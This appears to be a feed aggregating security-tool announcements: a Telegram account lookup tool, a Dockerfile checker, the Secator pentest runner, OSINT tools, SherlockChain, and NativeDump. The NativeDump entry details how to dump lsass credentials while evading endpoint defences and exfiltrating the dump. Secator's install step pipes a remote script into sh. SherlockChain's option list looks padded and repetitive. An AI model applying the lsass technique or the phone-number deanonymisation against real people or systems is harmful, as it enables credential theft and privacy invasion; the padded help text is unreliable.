FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

Telegram-Checker - A Python Tool For Checking Telegram Accounts Via Phone Numbers Or Usernames

By: Unknown


Enhanced version of bellingcat's Telegram Phone Checker!

A Python script to check Telegram accounts using phone numbers or username.


✨ Features

  • πŸ” Check single or multiple phone numbers and usernames
  • πŸ“ Import numbers from text file
  • πŸ“Έ Auto-download profile pictures
  • πŸ’Ύ Save results as JSON
  • πŸ” Secure credential storage
  • πŸ“Š Detailed user information

πŸš€ Installation

  1. Clone the repository:
git clone https://github.com/unnohwn/telegram-checker.git
cd telegram-checker
  1. Install required packages:
pip install -r requirements.txt

πŸ“¦ Requirements

Contents of requirements.txt:

telethon
rich
click
python-dotenv

Or install packages individually:

pip install telethon rich click python-dotenv

βš™οΈ Configuration

First time running the script, you'll need: - Telegram API credentials (get from https://my.telegram.org/apps) - Your Telegram phone number including countrycode + - Verification code (sent to your Telegram)

πŸ’» Usage

Run the script:

python telegram_checker.py

Choose from options: 1. Check phone numbers from input 2. Check phone numbers from file 3. Check usernames from input 4. Check usernames from file 5. Clear saved credentials 6. Exit

πŸ“‚ Output

Results are saved in: - results/ - JSON files with detailed information - profile_photos/ - Downloaded profile pictures

⚠️ Note

This tool is for educational purposes only. Please respect Telegram's terms of service and user privacy.

πŸ“„ License

MIT License



Docf-Sec-Check - DockF-Sec-Check Helps To Make Your Dockerfile Commands More Secure

By: Unknown


DockF-Sec-Check helps to make your Dockerfile commands more secure.


Done

  • [x] First-level security notification in the Dockerfile

TODO List

  • [ ] Correctly detect the Dockerfile.
  • [ ] Second-level security notification in the Dockerfile.
  • [ ] Security notification in Docker images.
  • [ ] ***** (Private Repository)

Installation

From Source Code

You can use virtualenv for package dependencies before installation.

git clone https://github.com/OsmanKandemir/docf-sec-check.git
cd docf-sec-check
python setup.py build
python setup.py install

From Pypi

The application is available on PyPI. To install with pip:

pip install docfseccheck

From Dockerfile

You can run this application on a container after build a Dockerfile. You need to specify a path (YOUR-LOCAL-PATH) to scan the Dockerfile in your local.

docker build -t docfseccheck .
docker run -v <YOUR-LOCAL-PATH>/Dockerfile:/docf-sec-check/Dockerfile docfseccheck -f /docf-sec-check/Dockerfile

From DockerHub

docker pull osmankandemir/docfseccheck:v1.0
docker run -v <YOUR-LOCAL-PATH>/Dockerfile:/docf-sec-check/Dockerfile osmankandemir/docfseccheck:v1.0 -f /docf-sec-check/Dockerfile


Usage

-f DOCKERFILE [DOCKERFILE], --file DOCKERFILE [DOCKERFILE] Dockerfile path. --file Dockerfile

Function Usage

from docfchecker import DocFChecker

#Dockerfile is your file PATH.

DocFChecker(["Dockerfile"])

Development and Contribution

See; CONTRIBUTING.md

License

Copyright (c) 2024 Osman Kandemir \ Licensed under the GPL-3.0 License.

Donations

If you like DocF-Sec-Check and would like to show support, you can use Buy A Coffee or Github Sponsors feature for the developer using the button below.

Or

Sponsor me : https://github.com/sponsors/OsmanKandemir 😊

Your support will be much appreciated😊



Secator - The Pentester'S Swiss Knife

By: Unknown


secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers.


Features

  • Curated list of commands

  • Unified input options

  • Unified output schema

  • CLI and library usage

  • Distributed options with Celery

  • Complexity from simple tasks to complex workflows

  • Customizable


Supported tools

secator integrates the following tools:

Name Description Category
httpx Fast HTTP prober. http
cariddi Fast crawler and endpoint secrets / api keys / tokens matcher. http/crawler
gau Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). http/crawler
gospider Fast web spider written in Go. http/crawler
katana Next-generation crawling and spidering framework. http/crawler
dirsearch Web path discovery. http/fuzzer
feroxbuster Simple, fast, recursive content discovery tool written in Rust. http/fuzzer
ffuf Fast web fuzzer written in Go. http/fuzzer
h8mail Email OSINT and breach hunting tool. osint
dnsx Fast and multi-purpose DNS toolkit designed for running DNS queries. recon/dns
dnsxbrute Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). recon/dns
subfinder Fast subdomain finder. recon/dns
fping Find alive hosts on local networks. recon/ip
mapcidr Expand CIDR ranges into IPs. recon/ip
naabu Fast port discovery tool. recon/port
maigret Hunt for user accounts across many websites. recon/user
gf A wrapper around grep to avoid typing common patterns. tagger
grype A vulnerability scanner for container images and filesystems. vuln/code
dalfox Powerful XSS scanning tool and parameter analyzer. vuln/http
msfconsole CLI to access and work with the Metasploit Framework. vuln/http
wpscan WordPress Security Scanner vuln/multi
nmap Vulnerability scanner using NSE scripts. vuln/multi
nuclei Fast and customisable vulnerability scanner based on simple YAML based DSL. vuln/multi
searchsploit Exploit searcher. exploit/search

Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criterias before doing so. If it doesn't but you still want to integrate it into secator, you can plug it in (see the dev guide).

Installation

Installing secator

Pipx
pipx install secator
Pip
pip install secator
Bash
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
Docker
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount -v is necessary to save all secator reports to your host machine, and--net=host is recommended to grant full access to the host network. You can alias this command to run it easier:
alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator like if it was installed on baremetal:
secator --help
Docker Compose
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help

Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.

Installing languages

secator uses external tools, so you might need to install languages used by those tools assuming they are not already installed on your system.

We provide utilities to install required languages if you don't manage them externally:

Go
secator install langs go
Ruby
secator install langs ruby

Installing tools

secator does not install any of the external tools it supports by default.

We provide utilities to install or update each supported tool which should work on all systems supporting apt:

All tools
secator install tools
Specific tools
secator install tools <TOOL_NAME>
For instance, to install `httpx`, use:
secator install tools httpx

Please make sure you are using the latest available versions for each tool before you run secator or you might run into parsing / formatting issues.

Installing addons

secator comes installed with the minimum amount of dependencies.

There are several addons available for secator:

worker Add support for Celery workers (see [Distributed runs with Celery](https://docs.freelabz.com/in-depth/distributed-runs-with-celery)).
secator install addons worker
google Add support for Google Drive exporter (`-o gdrive`).
secator install addons google
mongodb Add support for MongoDB driver (`-driver mongodb`).
secator install addons mongodb
redis Add support for Redis backend (Celery).
secator install addons redis
dev Add development tools like `coverage` and `flake8` required for running tests.
secator install addons dev
trace Add tracing tools like `memray` and `pyinstrument` required for tracing functions.
secator install addons trace
build Add `hatch` for building and publishing the PyPI package.
secator install addons build

Install CVEs

secator makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:

secator install cves

Checking installation health

To figure out which languages or tools are installed on your system (along with their version):

secator health

Usage

secator --help


Usage examples

Run a fuzzing task (ffuf):

secator x ffuf http://testphp.vulnweb.com/FUZZ

Run a url crawl workflow:

secator w url_crawl http://testphp.vulnweb.com

Run a host scan:

secator s host mydomain.com

and more... to list all tasks / workflows / scans that you can use:

secator x --help
secator w --help
secator s --help

Learn more

To go deeper with secator, check out: * Our complete documentation * Our getting started tutorial video * Our Medium post * Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube



Ashok - A OSINT Recon Tool, A.K.A Swiss Army Knife

By: Unknown


Reconnaissance is the first phase of penetration testing which means gathering information before any real attacks are planned So Ashok is an Incredible fast recon tool for penetration tester which is specially designed for Reconnaissance" title="Reconnaissance">Reconnaissance phase. And in Ashok-v1.1 you can find the advanced google dorker and wayback crawling machine.



Main Features

- Wayback Crawler Machine
- Google Dorking without limits
- Github Information Grabbing
- Subdomain Identifier
- Cms/Technology Detector With Custom Headers

Installation

~> git clone https://github.com/ankitdobhal/Ashok
~> cd Ashok
~> python3.7 -m pip3 install -r requirements.txt

How to use Ashok?

A detailed usage guide is available on Usage section of the Wiki.

But Some index of options is given below:

Docker

Ashok can be launched using a lightweight Python3.8-Alpine Docker image.

$ docker pull powerexploit/ashok-v1.2
$ docker container run -it powerexploit/ashok-v1.2 --help


    Credits



    NativeDump - Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)

    By: Unknown


    NativeDump allows to dump the lsass process using only NTAPIs generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List Streams).


    • NTOpenProcessToken and NtAdjustPrivilegeToken to get the "SeDebugPrivilege" privilege
    • RtlGetVersion to get the Operating System version details (Major version, minor version and build number). This is necessary for the SystemInfo Stream
    • NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address. This is the only module necessary for the ModuleList Stream
    • NtOpenProcess to get a handle for the lsass process
    • NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all possible ones. At the same time it populates the Memory64List Stream

    Usage:

    NativeDump.exe [DUMP_FILE]

    The default file name is "proc_.dmp":

    The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoints, Crowdstrike...) and is for now undetected. However, it does not work if PPL is enabled in the system.

    Some benefits of this technique are: - It does not use the well-known dbghelp!MinidumpWriteDump function - It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library - The Minidump file does not have to be written to disk, you can transfer its bytes (encoded or encrypted) to a remote machine

    The project has three branches at the moment (apart from the main branch with the basic technique):

    • ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk

    • delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding

    • remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding


    Technique in detail: Creating a minimal Minidump file

    After reading Minidump undocumented structures, its structure can be summed up to:

    • Header: Information like the Signature ("MDMP"), the location of the Stream Directory and the number of streams
    • Stream Directory: One entry for each stream, containing the type, total size and location in the file of each one
    • Streams: Every stream contains different information related to the process and has its own format
    • Regions: The actual bytes from the process from each memory region which can be read

    I created a parsing tool which can be helpful: MinidumpParser.

    We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.


    A. Header

    The header is a 32-bytes structure which can be defined in C# as:

    public struct MinidumpHeader
    {
    public uint Signature;
    public ushort Version;
    public ushort ImplementationVersion;
    public ushort NumberOfStreams;
    public uint StreamDirectoryRva;
    public uint CheckSum;
    public IntPtr TimeDateStamp;
    }

    The required values are: - Signature: Fixed value 0x504d44d ("MDMP" string) - Version: Fixed value 0xa793 (Microsoft constant MINIDUMP_VERSION) - NumberOfStreams: Fixed value 3, the three Streams required for the file - StreamDirectoryRVA: Fixed value 0x20 or 32 bytes, the size of the header


    B. Stream Directory

    Each entry in the Stream Directory is a 12-bytes structure so having 3 entries the size is 36 bytes. The C# struct definition for an entry is:

    public struct MinidumpStreamDirectoryEntry
    {
    public uint StreamType;
    public uint Size;
    public uint Location;
    }

    The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:

    ID Stream Type
    0x00 UnusedStream
    0x01 ReservedStream0
    0x02 ReservedStream1
    0x03 ThreadListStream
    0x04 ModuleListStream
    0x05 MemoryListStream
    0x06 ExceptionStream
    0x07 SystemInfoStream
    0x08 ThreadExListStream
    0x09 Memory64ListStream
    0x0A CommentStreamA
    0x0B CommentStreamW
    0x0C HandleDataStream
    0x0D FunctionTableStream
    0x0E UnloadedModuleListStream
    0x0F MiscInfoStream
    0x10 MemoryInfoListStream
    0x11 ThreadInfoListStream
    0x12 HandleOperationListStream
    0x13 TokenStream
    0x16 HandleOperationListStream

    C. SystemInformation Stream

    First stream is a SystemInformation Stream, with ID 7. The size is 56 bytes and will be located at offset 68 (0x44), after the Stream Directory. Its C# definition is:

    public struct SystemInformationStream
    {
    public ushort ProcessorArchitecture;
    public ushort ProcessorLevel;
    public ushort ProcessorRevision;
    public byte NumberOfProcessors;
    public byte ProductType;
    public uint MajorVersion;
    public uint MinorVersion;
    public uint BuildNumber;
    public uint PlatformId;
    public uint UnknownField1;
    public uint UnknownField2;
    public IntPtr ProcessorFeatures;
    public IntPtr ProcessorFeatures2;
    public uint UnknownField3;
    public ushort UnknownField14;
    public byte UnknownField15;
    }

    The required values are: - ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems - Major version, Minor version and the BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)


    D. ModuleList Stream

    Second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C) after the SystemInformation stream and it will also have a fixed size, of 112 bytes, since it will have the entry of a single module, the only one needed for the parse to be correct: "lsasrv.dll".

    The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:

    public struct ModuleListStream
    {
    public uint NumberOfModules;
    public ModuleInfo[] Modules;
    }

    As there is only one, it gets simplified to:

    public struct ModuleListStream
    {
    public uint NumberOfModules;
    public IntPtr BaseAddress;
    public uint Size;
    public uint UnknownField1;
    public uint Timestamp;
    public uint PointerName;
    public IntPtr UnknownField2;
    public IntPtr UnknownField3;
    public IntPtr UnknownField4;
    public IntPtr UnknownField5;
    public IntPtr UnknownField6;
    public IntPtr UnknownField7;
    public IntPtr UnknownField8;
    public IntPtr UnknownField9;
    public IntPtr UnknownField10;
    public IntPtr UnknownField11;
    }

    The required values are: - NumberOfStreams: Fixed value 1 - BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter) - Size: Obtained adding all memory region sizes since BaseAddress until one with a size of 4096 bytes (0x1000), the .text section of other library - PointerToName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)


    E. Memory64List Stream

    Third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of modules.

    public struct Memory64ListStream
    {
    public ulong NumberOfEntries;
    public uint MemoryRegionsBaseAddress;
    public Memory64Info[] MemoryInfoEntries;
    }

    Each module entry is a 16-bytes structure:

    public struct Memory64Info
    {
    public IntPtr Address;
    public IntPtr Size;
    }

    The required values are: - NumberOfEntries: Number of memory regions, obtained after looping memory regions - MemoryRegionsBaseAddress: Location of the start of memory regions bytes, calculated after adding the size of all 16-bytes memory entries - Address and Size: Obtained for each valid region while looping them


    F. Looping memory regions

    There are pre-requisites to loop the memory regions of the lsass.exe process which can be solved using only NTAPIs:

    1. Obtain the "SeDebugPrivilege" permission. Instead of the typical Advapi!OpenProcessToken, Advapi!LookupPrivilegeValue and Advapi!AdjustTokenPrivilege, we will use ntdll!NtOpenProcessToken, ntdll!NtAdjustPrivilegesToken and the hardcoded value of 20 for the Luid (which is constant in all latest Windows versions)
    2. Obtain the process ID. For example, loop all processes using ntdll!NtGetNextProcess, obtain the PEB address with ntdll!NtQueryInformationProcess and use ntdll!NtReadVirtualMemory to read the ImagePathName field inside ProcessParameters. To avoid overcomplicating the PoC, we will use .NET's Process.GetProcessesByName()
    3. Open a process handle. Use ntdll!OpenProcess with permissions PROCESS_QUERY_INFORMATION (0x0400) to retrieve process information and PROCESS_VM_READ (0x0010) to read the memory bytes

    With this it is possible to traverse process memory by calling: - ntdll!NtQueryVirtualMemory: Return a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region - If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populates one entry of the Memory64List stream and bytes can be added to the file - If the base address equals lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory - ntdll!NtReadVirtualMemory: Add bytes of that region to the Minidump file after the Memory64List Stream


    G. Creating Minidump file

    After previous steps we have all that is necessary to create the Minidump file. We can create a file locally or send the bytes to a remote machine, with the possibility of encoding or encrypting the bytes before. Some of these possibilities are coded in the delegates branch, where the file created locally can be encoded with XOR, and in the remote branch, where the file can be encoded with XOR before being sent to a remote machine.




    PIP-INTEL - OSINT and Cyber Intelligence Tool

    By: Unknown

    Β 


    Pip-Intel is a powerful tool designed for OSINT (Open Source Intelligence) and cyber intelligence gathering activities. It consolidates various open-source tools into a single user-friendly interface simplifying the data collection and analysis processes for researchers and cybersecurity professionals.

    Pip-Intel utilizes Python-written pip packages to gather information from various data points. This tool is equipped with the capability to collect detailed information through email addresses, phone numbers, IP addresses, and social media accounts. It offers a wide range of functionalities including email-based OSINT operations, phone number-based inquiries, geolocating IP addresses, social media and user analyses, and even dark web searches.




    SherlockChain - A Streamlined AI Analysis Framework For Solidity, Vyper And Plutus Contracts

    By: Zion3R


    SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.


    Key Features

    • Comprehensive Vulnerability Detection: SherlockChain's suite of detectors identifies a wide range of vulnerabilities, including high-impact issues like reentrancy, unprotected upgrades, and more.
    • AI-Powered Analysis: Integrated AI models enhance the accuracy and precision of vulnerability detection, providing developers with actionable insights and recommendations.
    • Seamless Integration: SherlockChain seamlessly integrates with popular development frameworks like Hardhat, Foundry, and Brownie, making it easy to incorporate into your existing workflow.
    • Intuitive Reporting: SherlockChain generates detailed reports with clear explanations and code snippets, helping developers quickly understand and address identified issues.
    • Customizable Analyses: The framework's flexible API allows users to write custom analyses and detectors, tailoring the tool to their specific needs.
    • Continuous Monitoring: SherlockChain can be integrated into your CI/CD pipeline, providing ongoing monitoring and alerting for your smart contract codebase.

    Installation

    To install SherlockChain, follow these steps:

    git clone https://github.com/0xQuantumCoder/SherlockChain.git
    cd SherlockChain
    pip install .

    AI-Powered Features

    SherlockChain's AI integration brings several advanced capabilities to the table:

    1. Intelligent Vulnerability Prioritization: AI models analyze the context and potential impact of detected vulnerabilities, providing developers with a prioritized list of issues to address.
    2. Automated Remediation Suggestions: The AI component suggests potential fixes and code modifications to address identified vulnerabilities, accelerating the remediation process.
    3. Proactive Security Auditing: SherlockChain's AI models continuously monitor your codebase, proactively identifying emerging threats and providing early warning signals.
    4. Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses. he --help command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:

    5. Vulnerability Detection: The --detect and --exclude-detectors options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.

    6. Reporting: The --report-format, --report-output, and various --report-* options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).
    7. Filtering: The --filter-* options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.
    8. AI Integration: The --ai-* options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.
    9. Integration with Development Frameworks: Options like --truffle and --truffle-build-directory facilitate the integration of SherlockChain into popular development frameworks like Truffle.
    10. Miscellaneous Options: Additional options for compiling contracts, listing detectors, and customizing the analysis process.

    The --help command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.

    Example usage:

    sherlockchain --help

    This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.

    usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
    [--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
    [--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
    [--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
    [--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
    [--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
    [--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
    [--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
    [--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
    [--filter-check-upgradeable] [--f ilter-check-erc20] [--filter-check-erc721]
    [--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
    [--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
    [--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
    [--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
    [--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
    [--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
    [--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
    [--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
    [--report-severity REPORT_SEVERITY] [--report-impact R EPORT_IMPACT]
    [--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
    [--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
    [--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
    [--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
    [--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
    [--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
    [--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
    [--report-all-detectors] [--report-all-severity] [--report-all-impact]
    [--report-all-confidence] [--report-all-categories] [--report-all-filters]
    [--report-all-options] [- -report-all] [--report-none] [--ai-enabled] [--ai-disabled]
    [--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
    [--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
    [--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
    [--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
    [--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
    [--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
    [--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
    [--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
    [--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
    [--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
    [--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
    [--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
    [--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
    [--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
    [--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
    [--ai-models-config- version-minor AI_MODELS_CONFIG_VERSION_MINOR]
    [--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
    [--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
    [--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
    [--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
    [--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
    [--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
    [--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
    [--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
    [--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
    [--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
    [--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
    [--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
    [--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
    [--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
    [--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
    [--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
    [--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
    [--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
    [--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
    [--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
    [--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
    [--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
    [--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
    [--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
    [--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]

    This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:

    • Vulnerability detection options: --detect, --exclude-detectors
    • Reporting options: --report-format, --report-output, --report-*
    • Filtering options: --filter-*
    • AI integration options: --ai-*
    • Integration with development frameworks: --truffle, --truffle-build-directory
    • Miscellaneous options: --compile, --list-detectors, --list-detectors-info

    By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.

    AI-Powered Detectors

    Num Detector What it Detects Impact Confidence
    1 ai-anomaly-detection Detect anomalous code patterns using advanced AI models High High
    2 ai-vulnerability-prediction Predict potential vulnerabilities using machine learning High High
    3 ai-code-optimization Suggest code optimizations based on AI-driven analysis Medium High
    4 ai-contract-complexity Assess contract complexity and maintainability using AI Medium High
    5 ai-gas-optimization Identify gas-optimizing opportunities with AI Medium Medium
    ## Detectors
    Num Detector What it Detects Impact Confidence
    1 abiencoderv2-array Storage abiencoderv2 array High High
    2 arbitrary-send-erc20 transferFrom uses arbitrary from High High
    3 array-by-reference Modifying storage array by value High High
    4 encode-packed-collision ABI encodePacked Collision High High
    5 incorrect-shift The order of parameters in a shift instruction is incorrect. High High
    6 multiple-constructors Multiple constructor schemes High High
    7 name-reused Contract's name reused High High
    8 protected-vars Detected unprotected variables High High
    9 public-mappings-nested Public mappings with nested variables High High
    10 rtlo Right-To-Left-Override control character is used High High
    11 shadowing-state State variables shadowing High High
    12 suicidal Functions allowing anyone to destruct the contract High High
    13 uninitialized-state Uninitialized state variables High High
    14 uninitialized-storage Uninitialized storage variables High High
    15 unprotected-upgrade Unprotected upgradeable contract High High
    16 codex Use Codex to find vulnerabilities. High Low
    17 arbitrary-send-erc20-permit transferFrom uses arbitrary from with permit High Medium
    18 arbitrary-send-eth Functions that send Ether to arbitrary destinations High Medium
    19 controlled-array-length Tainted array length assignment High Medium
    20 controlled-delegatecall Controlled delegatecall destination High Medium
    21 delegatecall-loop Payable functions using delegatecall inside a loop High Medium
    22 incorrect-exp Incorrect exponentiation High Medium
    23 incorrect-return If a return is incorrectly used in assembly mode. High Medium
    24 msg-value-loop msg.value inside a loop High Medium
    25 reentrancy-eth Reentrancy vulnerabilities (theft of ethers) High Medium
    26 return-leave If a return is used instead of a leave. High Medium
    27 storage-array Signed storage integer array compiler bug High Medium
    28 unchecked-transfer Unchecked tokens transfer High Medium
    29 weak-prng Weak PRNG High Medium
    30 domain-separator-collision Detects ERC20 tokens that have a function whose signature collides with EIP-2612's DOMAIN_SEPARATOR() Medium High
    31 enum-conversion Detect dangerous enum conversion Medium High
    32 erc20-interface Incorrect ERC20 interfaces Medium High
    33 erc721-interface Incorrect ERC721 interfaces Medium High
    34 incorrect-equality Dangerous strict equalities Medium High
    35 locked-ether Contracts that lock ether Medium High
    36 mapping-deletion Deletion on mapping containing a structure Medium High
    37 shadowing-abstract State variables shadowing from abstract contracts Medium High
    38 tautological-compare Comparing a variable to itself always returns true or false, depending on comparison Medium High
    39 tautology Tautology or contradiction Medium High
    40 write-after-write Unused write Medium High
    41 boolean-cst Misuse of Boolean constant Medium Medium
    42 constant-function-asm Constant functions using assembly code Medium Medium
    43 constant-function-state Constant functions changing the state Medium Medium
    44 divide-before-multiply Imprecise arithmetic operations order Medium Medium
    45 out-of-order-retryable Out-of-order retryable transactions Medium Medium
    46 reentrancy-no-eth Reentrancy vulnerabilities (no theft of ethers) Medium Medium
    47 reused-constructor Reused base constructor Medium Medium
    48 tx-origin Dangerous usage of tx.origin Medium Medium
    49 unchecked-lowlevel Unchecked low-level calls Medium Medium
    50 unchecked-send Unchecked send Medium Medium
    51 uninitialized-local Uninitialized local variables Medium Medium
    52 unused-return Unused return values Medium Medium
    53 incorrect-modifier Modifiers that can return the default value Low High
    54 shadowing-builtin Built-in symbol shadowing Low High
    55 shadowing-local Local variables shadowing Low High
    56 uninitialized-fptr-cst Uninitialized function pointer calls in constructors Low High
    57 variable-scope Local variables used prior their declaration Low High
    58 void-cst Constructor called not implemented Low High
    59 calls-loop Multiple calls in a loop Low Medium
    60 events-access Missing Events Access Control Low Medium
    61 events-maths Missing Events Arithmetic Low Medium
    62 incorrect-unary Dangerous unary expressions Low Medium
    63 missing-zero-check Missing Zero Address Validation Low Medium
    64 reentrancy-benign Benign reentrancy vulnerabilities Low Medium
